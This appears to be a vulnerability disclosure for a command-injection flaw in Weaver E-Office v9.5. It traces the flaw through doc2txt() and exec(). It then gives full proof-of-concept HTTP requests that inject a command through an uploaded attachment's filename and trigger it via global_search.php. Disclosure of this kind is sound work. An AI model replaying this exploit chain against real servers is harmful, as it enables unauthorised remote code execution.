weaver E-Office v9.5 Command execution vulnerabilities
official website:https://www.e-office.cn/
version:v9.5
The exploit functions appeared at lines 1007-1008 of /webroot/inc/utility_all.php. The custom function doc2txt() called exec() function, and the $path variable was controllable by users without restrictions, which could be used to inject arbitrary commands using the command connection symbol "&&".
The vulnerability trigger point is located in the /webroot/general/file_folder/global_search.php file. We call doc2txt() at line 108 and then trace back to the source of the doc2txt() argument $FILE_PATH, Concatenate the values of ATTACHMENT_ID(folder) and ATTACHMENT_NAME(file name) columns in data table FLE_CONTENT for attachment directory (C:\eoffice9\webroot\attachment) to get the full file path.
Note that the registration global variable setting (register_globals = On) is enabled in the php configuration file (php.ini), So the value of variable $ATTACHMENT_DATA at line 93 and variable $SEARCH_DOC at line 106 requires the user to GET/POST in. And 103 lines will check the file exists, so should not be included in the file in command execution cannot use \ / | < > : * "? Special symbol.
Folder where the attachment is located:
Attachment name:
To view the files in this directory:
exploitation of vulnerability
Create a common user named test with the role of employee.
Log in as the test user, go to Document Center -> New Document, create a document and upload the attachment named "1&&calc&© nul a.doc", then click Submit.
upload attachment
upload attachment Updates data table attachment information.
Visit the vulnerability trigger page. http://172.16.10.124/general/file_folder/global_search.php?ATTACHMENT_DATA=1&SEARCH_DOC=on
Log in to the server to view the process and enable the Windows calculator.
POC
upload attachment
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 172.16.10.124
Content-Length: 328
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1ZCUAAAXxnYuVIZR
Accept: */*
Origin: http://172.16.10.124
Referer: http://172.16.10.124/general/file_folder/file_new/neworedit/index.php?FILE_SORT=1&func_id=7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: LOGIN_LANG=cn; PHPSESSID=16a132db599e8d54a45e704389a29686
Connection: close
------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="name"
1&&calc&© nul a.doc
------WebKitFormBoundary1ZCUAAAXxnYuVIZR
Content-Disposition: form-data; name="Filedata"; filename="1&&calc&© nul a.doc"
Content-Type: application/msword
aaaaa
------WebKitFormBoundary1ZCUAAAXxnYuVIZR--
Update the data in the data table
POST /general/file_folder/file_new/neworedit/submit.php?func_id=3 HTTP/1.1
Host: 172.16.10.124
Content-Length: 2426
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.10.124
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2JIQiWFev9A8p6UP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.10.124/general/file_folder/file_new/neworedit/index.php?FILE_SORT=1&func_id=7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: MODE_TILE=tree; LOGIN_LANG=cn; LOGIN_LANG=cn; PHPSESSID=16a132db599e8d54a45e704389a29686
Connection: close
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="check_log_id"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="attachmentIDStr"
1575146901,
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="attachmentNameStr"
1&&calc&© nul a.doc*
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="filename_id"
eoffice9.0功能资料
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="SORT_ID"
28
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="SUBJECT"
test
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="type_value"
1
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="file_elem"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="SMS_USER_ID"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="MOVEBILE_USER_ID"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="EMAIL_USER_ID"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="ATTACHMENT_ID_OLD"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="ATTACHMENT_NAME_OLD"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="refreshno"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="content_type"
1
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="CONTENT_ID"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="OP"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="FILE_SORT"
1
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="cur_page"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="operationType"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="docStr"
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="contentTypeStr"
html
------WebKitFormBoundary2JIQiWFev9A8p6UP
Content-Disposition: form-data; name="editorValue"
------WebKitFormBoundary2JIQiWFev9A8p6UP--
Access a trigger page
GET /general/file_folder/global_search.php?ATTACHMENT_DATA=1&SEARCH_DOC=on HTTP/1.1
Host: 172.16.10.124
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: LOGIN_LANG=cn; PHPSESSID=16a132db599e8d54a45e704389a29686
Connection: close









